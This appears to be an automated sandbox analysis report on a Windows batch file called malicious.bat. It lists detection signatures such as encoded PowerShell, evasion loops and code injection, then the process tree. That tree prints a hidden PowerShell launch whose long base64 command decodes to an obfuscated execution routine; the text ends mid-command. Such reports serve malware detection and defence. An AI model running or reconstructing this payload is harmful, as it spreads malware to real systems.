Windows
Analysis Report
malicious.bat
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious PowerShell Parameter Substring
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64native
cmd.exe (PID: 2900 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\malic ious.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 5084 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) powershell.exe (PID: 7232 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 power shell -w h -e ZgB1AG 4AYwB0AGkA bwBuACAAYg BEAFgAdgBW ACgAJABrAE MAcgBiAHgA KQAgAHsAcg BlAHQAdQBy AG4AIABbAG MAaABhAHIA XQA6ADoAQw BvAG4AdgBl AHIAdABGAH IAbwBtAFUA dABmADMAMg AoACQAawBD AHIAYgB4AC kAfQAmACgA KABiAEQAWA B2AFYAKAAw AHgANgA5AC kAKQArACgA YgBEAFgAdg BWACgAMAB4 ADYANQApAC kAKwAoAGIA RABYAHYAVg AoADAAeAA3 ADgAKQApAC kAKAAoAGIA RABYAHYAVg AoADAAeAA1 ADMAKQApAC sAKABiAEQA WAB2AFYAKA AwAHgANwA0 ACkAKQArAC gAYgBEAFgA dgBWACgAMA B4ADYAMQAp ACkAKwAoAG IARABYAHYA VgAoADAAeA A3ADIAKQAp ACsAKABiAE QAWAB2AFYA KAAwAHgANw A0ACkAKQAr ACgAYgBEAF gAdgBWACgA MAB4ADIAZA ApACkAKwAo AGIARABYAH YAVgAoADAA eAA1ADAAKQ ApACsAKABi AEQAWAB2AF YAKAAwAHgA NwAyACkAKQ ArACgAYgBE AFgAdgBWAC gAMAB4ADYA ZgApACkAKw AoAGIARABY AHYAVgAoAD AAeAA2ADMA KQApACsAKA BiAEQAWAB2 AFYAKAAwAH gANgA1ACkA KQArACgAYg BEAFgAdgBW ACgAMAB4AD cAMwApACkA KwAoAGIARA BYAHYAVgAo ADAAeAA3AD MAKQApACsA KABiAEQAWA B2AFYAKAAw AHgAMgAwAC kAKQArACgA YgBEAFgAdg BWACgAMAB4 ADIAMgApAC kAKwAoAGIA RABYAHYAVg AoADAAeAAy ADQAKQApAC sAKABiAEQA WAB2AFYAKA AwAHgANgA1 ACkAKQArAC gAYgBEAFgA dgBWACgAMA B4ADYAZQAp ACkAKwAoAG IARABYAHYA VgAoADAAeA A3ADYAKQAp ACsAKABiAE QAWAB2AFYA KAAwAHgAMw BhACkAKQAr ACgAYgBEAF gAdgBWACgA MAB4ADUANw ApACkAKwAo AGIARABYAH YAVgAoADAA eAA0ADkAKQ ApACsAKABi AEQAWAB2AF YAKAAwAHgA NABlACkAKQ ArACgAYgBE AFgAdgBWAC gAMAB4ADQA NAApACkAKw AoAGIARABY AHYAVgAoAD AAeAA0ADkA KQApACsAKA BiAEQAWAB2 AFYAKAAwAH gANQAyACkA KQArACgAYg BEAFgAdgBW ACgAMAB4AD UAYwApACkA KwAoAGIARA BYAHYAVgAo ADAAeAA1AD MAKQApACsA KABiAEQAWA B2AFYAKAAw AHgANwA5AC kAKQArACgA YgBEAFgAdg BWACgAMAB4 ADcAMwApAC kAKwAoAGIA RABYAHYAVg AoADAAeAA1 ADcAKQApAC sAKABiAEQA WAB2AFYAKA AwAHgANABm ACkAKQArAC gAYgBEAFgA dgBWACgAMA B4ADUANwAp ACkAKwAoAG IARABYAHYA VgAoADAAeA AzADYAKQAp ACsAKABiAE QAWAB2AFYA KAAwAHgAMw A0ACkAKQAr ACgAYgBEAF gAdgBWACgA MAB4ADUAYw ApACkAKwAo AGIARABYAH YAVgAoADAA eAA1ADcAKQ ApACsAKABi AEQAWAB2AF YAKAAwAHgA NgA5ACkAKQ ArACgAYgBE AFgAdgBWAC gAMAB4ADYA ZQApACkAKw AoAGIARABY AHYAVgAoAD AAeAA2ADQA KQApACsAKA BiAEQAWAB2 AFYAKAAwAH gANgBmACkA KQArACgAYg BEAFgAdgBW ACgAMAB4AD cANwApACkA KwAoAGIARA BYAHYAVgAo ADAAeAA3AD MAKQApACsA KABiAEQAWA B2AFYAKAAw AHgANQAwAC kAKQArACgA YgBEAFgAdg BWACgAMAB4 ADYAZgApAC kAKwAoAGIA RABYAHYAVg AoADAAeAA3 ADcAKQApAC sAKABiAEQA WAB2AFYAKA AwAHgANgA1 ACkAKQArAC gAYgBEAFgA dgBWACgAMA B4ADcAMgAp ACkAKwAoAG IARABYAHYA VgAoADAAeA A1ADMAKQAp ACsAKABiAE QAWAB2AFYA KAAwAHgANg A4ACkAKQAr ACgAYgBEAF gAdgBWACgA MAB4ADYANQ ApACkAKwAo AGIARABYAH YAVgAoADAA eAA2AGMAKQ ApACsAKABi AEQAWAB2AF YAKAAwAHgA NgBjACkAKQ ArACgAYgBE AFgAdgBWAC gAMAB4ADUA YwApACkAKw AoAGIARABY AHYAVgAoAD AAeAA3ADYA KQApACsAKA BiAEQAWAB2 AFYAKAAwAH gAMwAxACkA KQArACgAYg